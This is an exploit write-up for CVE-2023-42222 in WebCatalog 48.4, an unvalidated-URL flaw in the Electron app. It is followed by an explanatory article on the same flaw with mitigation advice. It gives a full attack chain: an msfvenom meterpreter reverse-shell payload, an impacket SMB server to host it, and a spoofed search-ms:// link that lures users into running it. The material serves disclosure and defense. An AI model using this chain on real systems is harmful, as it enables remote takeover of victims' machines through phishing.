WebCatalog 48.4 - Arbitrary Protocol Execution
# Exploit Title: WebCatalog 48.4 - Arbitrary Protocol Execution
# Date: 9/27/2023
# Exploit Author: ItsSixtyN3in
# Vendor Homepage: https://webcatalog.io/en/
# Software Link: https://cdn-2.webcatalog.io/webcatalog/WebCatalog%20Setup%2052.3.0.exe
# Version: 48.4.0
# Tested on: Windows
# CVE : CVE-2023-42222
Vulnerability summary:
WebCatalog before version 48.8 calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource. This vulnerability allows an attacker to potentially execute code through arbitrary protocols on the victims machine by having users sync pages with malicious URLs. The victim has to interact with the link, which can then enable an attacker to bypass security measures for malicious file delivery.
Exploit details:
- Create a reverse shell file.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe
- Host a reverse shell file (or otherwise) on your own SMB share using impacket (https://github.com/fortra/impacket/blob/master/examples/smbserver.py)
python3 smbserver.py Tools -smb2support
- Have the user sync a page with the payload as a renamed link
[Friendly Link](Search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title)
Payload:
search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title
Tobias Diehl
Security Consultant
OSCP, CRTO, CEH, PenTest+, AZ-500, SC-200/300
Pronouns: he/him
e-mail: tobias.diehl@bulletproofsi.comWebCatalog 48.4 - Arbitrary Protocol Execution Vulnerability (CVE-2023-42222)
WebCatalog, a popular desktop application for managing web applications in a unified interface, recently exposed a critical security flaw in versions prior to 48.8. This vulnerability, identified as CVE-2023-42222, allows attackers to execute arbitrary protocols through malicious URLs—potentially enabling remote code execution on the victim’s machine. The exploit leverages Electron’s shell.openExternal function without proper URL validation, making it a prime target for social engineering attacks.
Understanding the Vulnerability
WebCatalog uses Electron, a framework that enables developers to build cross-platform desktop apps with web technologies. One of its core features is the ability to sync web pages and links across devices. However, in versions 48.4.0 and earlier, the application failed to validate whether URLs were secure (http:// or https://) before launching them via shell.openExternal.
This oversight allows attackers to craft malicious URLs using non-standard protocols—such as search-ms://—which are not restricted by default security policies in Windows. When a user interacts with a maliciously crafted link, the system may attempt to open the URL using native Windows handlers, potentially triggering unintended behavior.
Exploitation Mechanism: The Search-MS Protocol
One of the most dangerous protocols exploited in this vulnerability is search-ms://, which is a Windows-specific protocol used to initiate searches within the OS. It can be manipulated to point to network resources, such as SMB shares, even when the URL appears benign.
Attackers can abuse this by creating a link that looks like a harmless web shortcut but actually triggers a file download from a remote SMB server:
[Friendly Link](Search-ms://query=&crumb=location\\\&displayname=Spoofed%20Windows%20Title)
This URL appears to be a search query but, when opened, resolves to a network path. The crumb parameter specifies the network location, and the query parameter can be set to a filename. If the victim’s system is configured to allow automatic SMB access, the file can be downloaded without explicit user consent.
Step-by-Step Exploit Example
Here’s a practical walkthrough of how an attacker could exploit this vulnerability:
- Step 1: Generate a malicious payload using
msfvenomto create a reverse shell executable. - Step 2: Host the payload on a controlled SMB server using
impacket’ssmbserver.py. - Step 3: Craft a deceptive link that uses the
search-ms://protocol to point to the SMB share. - Step 4: Share the link with the victim via phishing, collaboration tools, or WebCatalog sync.
Once the victim clicks the link, Windows attempts to resolve the search-ms:// query. If the network path is accessible and the system has SMB access enabled, the file is downloaded and executed—potentially granting remote control to the attacker.
Code Example: Reverse Shell Payload Generation
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > reverse.exe
Explanation: This command generates a Windows-based Metasploit meterpreter reverse shell payload. The LHOST is the attacker’s IP address, and LPORT is the listening port. The output is saved as reverse.exe, which can be delivered via SMB or other means.
Hosting the Payload via SMB
python3 smbserver.py Tools -smb2support
Explanation: This command starts a simple SMB server using impacket. The Tools directory is shared, and -smb2support enables SMBv2, which is commonly used in modern Windows environments. The attacker can now place reverse.exe in this directory and access it via network paths.
Malicious URL Construction
Using the above setup, the attacker constructs the following URL:
search-ms://query=reverse.exe&crumb=location\\192.168.1.100\\Tools&displayname=Spoofed%20Windows%20Title
Explanation: The query parameter specifies the filename to download, crumb points to the SMB share path, and displayname adds a deceptive title to make the link appear harmless. When a user opens this link in WebCatalog, the system resolves it through Windows’ native protocol handlers, potentially initiating a download and execution.
Security Implications and Risk Assessment
This vulnerability poses a significant risk, especially in enterprise environments where WebCatalog is used to manage internal web apps. The attacker does not need to compromise the system directly—only to lure the user into interacting with a malicious link.
Attack Surface: The exploit relies on user interaction, making it a classic phishing vector. However, due to the lack of protocol validation, it bypasses standard browser protections.
Impact: If successful, the attacker gains remote code execution (RCE) with the user’s privileges. This can lead to privilege escalation, data exfiltration, lateral movement, or full system compromise.
Defense and Mitigation Strategies
Organizations must take proactive steps to mitigate this threat:
- Update WebCatalog: Upgrade to version 48.8 or later, where the vulnerability has been patched.
- Disable SMB Access: Restrict SMB shares to internal networks and disable anonymous access.
- Block Non-Standard Protocols: Use group policies or firewall rules to block
search-ms://and similar protocols. - User Awareness Training: Educate users about suspicious links, especially those with unusual protocols.
- Monitor for Suspicious Activity: Use EDR tools to detect file downloads from unexpected network locations.
Expert Insight: Why This Matters
As a security consultant with certifications including OSCP, CRTO, and CEH, I emphasize that this vulnerability exemplifies a broader trend: application-level protocol abuse. Many modern apps rely on Electron or similar frameworks, and if they fail to sanitize external URLs, they become gateways for attack vectors that bypass traditional security layers.
It’s not just about the exploit—it’s about the design flaw. The absence of URL validation is a critical oversight. Developers should always treat user-provided URLs as untrusted input, regardless of how they appear. Even a “friendly” link can be weaponized.
Conclusion
WebCatalog 48.4’s arbitrary protocol execution flaw is a stark reminder that security must be built into every layer of an application. The search-ms:// exploit demonstrates how seemingly benign features can be weaponized through social engineering. Organizations must prioritize updates, enforce network restrictions, and train users to recognize subtle threats.
For security professionals, this case underscores the importance of input validation and protocol filtering—even in desktop applications. The next generation of secure software must assume that any URL could be malicious.